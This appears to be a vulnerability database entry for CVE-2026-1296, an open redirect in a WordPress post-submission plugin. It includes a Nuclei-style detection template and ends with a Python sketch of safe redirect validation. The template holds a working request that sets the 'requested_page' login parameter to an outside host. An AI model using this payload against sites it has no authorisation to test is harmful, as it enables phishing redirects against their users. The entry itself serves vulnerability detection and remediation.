
Frontend Post Submission Manager Lite <= 1.2.7 - Open Redirect

CVE-2026-1296
Verified

Description

The Frontend Post Submission Manager Lite plugin for WordPress is vulnerable to Open Redirection in all versions up to, and including, 1.2.7 due to insufficient validation on the 'requested_page' POST parameter in the verify_username_password function. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action such as clicking on a link.

Severity

Medium

CVSS Score

6.1

Exploit Probability

0%

Published Date

March 16, 2026

Template Author

Shivam Kamboj

CVE-2026-1296.yaml
id: CVE-2026-1296

info:
  name: Frontend Post Submission Manager Lite <= 1.2.7 - Open Redirect
  author: Shivam Kamboj
  severity: medium
  description: |
    The Frontend Post Submission Manager Lite plugin for WordPress is vulnerable to Open Redirection in all versions up to, and including, 1.2.7 due to insufficient validation on the 'requested_page' POST parameter in the verify_username_password function. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action such as clicking on a link.
  impact: |
    Unauthenticated attackers can redirect users to malicious sites, potentially leading to phishing or malware exposure.
  remediation: |
    Update to a version later than 1.2.7 or the latest available version.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/frontend-post-submission-manager-lite/frontend-post-submission-manager-lite-127-unauthenticated-open-redirect-via-requested-page-parameter
    - http://nvd.nist.gov/vuln/detail/CVE-2026-1296
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-1296
    epss-score: 0.00387
    epss-percentile: 0.59957
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2026,wordpress,wp,wp-plugin,redirect,frontend-post-submission-manager-lite

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log=&pwd=&wp-submit=Log+In&action=login&requested_page=https://oast.pro

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1

      - type: status
        status:
          - 302
# digest: 490a0046304402204ba2044669c6bd0522d297ba9eee4f474421d2fcf6b44d70759836d5a9860acd02201fa9990d91ad776b32b51f97befd61aaf4b0dafe594dea678222b8f939510a80:922c64590222798bb761d5b6d8e72950
6.1 Score

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID: CVE-2026-1296
CWE ID: CWE-601

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/frontend-post-submission-manager-lite/frontend-post-submission-manager-lite-127-unauthenticated-open-redirect-via-requested-page-parameter
http://nvd.nist.gov/vuln/detail/CVE-2026-1296

Remediation Steps

Update to a version later than 1.2.7 or the latest available version.
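
The validation that the description says is missing for 'requested_page' can be sketched as a same-host check. This is an added example in Python, not the plugin's code or part of the template; `is_safe_redirect`, `check_samples` and the host `example.test` are assumed names, and the rejected forms are the ones the template's Location regex accepts as a hit (absolute, `//`, `/\` and userinfo `@`).

```python
from urllib.parse import urlsplit

def is_safe_redirect(target: str, site_host: str) -> bool:
    """Hypothetical helper: True only if `target` stays on `site_host`."""
    if not target:
        return False
    # Browsers treat "\" like "/" in http(s) URLs, so normalise before parsing.
    cleaned = target.strip().replace("\\", "/")
    if any(ch in cleaned for ch in "\r\n\t"):
        return False  # browsers drop these characters silently; refuse them
    try:
        parts = urlsplit(cleaned)
        host = parts.hostname
    except ValueError:
        return False  # malformed authority, e.g. a broken IPv6 literal
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False
    if not parts.scheme and not parts.netloc:
        # Relative reference: accept a single-slash path only ("///host" is off-site).
        return cleaned.startswith("/") and not cleaned.startswith("//")
    # Absolute or protocol-relative: the parsed host must be the site itself.
    return host == site_host.lower()

# Constructed sample values; example.test stands in for the WordPress site.
SAMPLES = [
    "/wp-admin/",
    "https://example.test/dashboard",
    "https://oast.pro",
    "//oast.pro",
    "/\\oast.pro",
    "https://example.test@oast.pro/",
    "///oast.pro",
    "https:oast.pro",
]

def check_samples(site_host: str = "example.test") -> dict:
    """Map each constructed sample to the allow/block decision."""
    return {s: is_safe_redirect(s, site_host) for s in SAMPLES}

if __name__ == "__main__":
    for value, ok in check_samples().items():
        print(f"{'allow' if ok else 'block':5}  {value!r}")
```

In WordPress code the corresponding core functions are `wp_validate_redirect()` and `wp_safe_redirect()`.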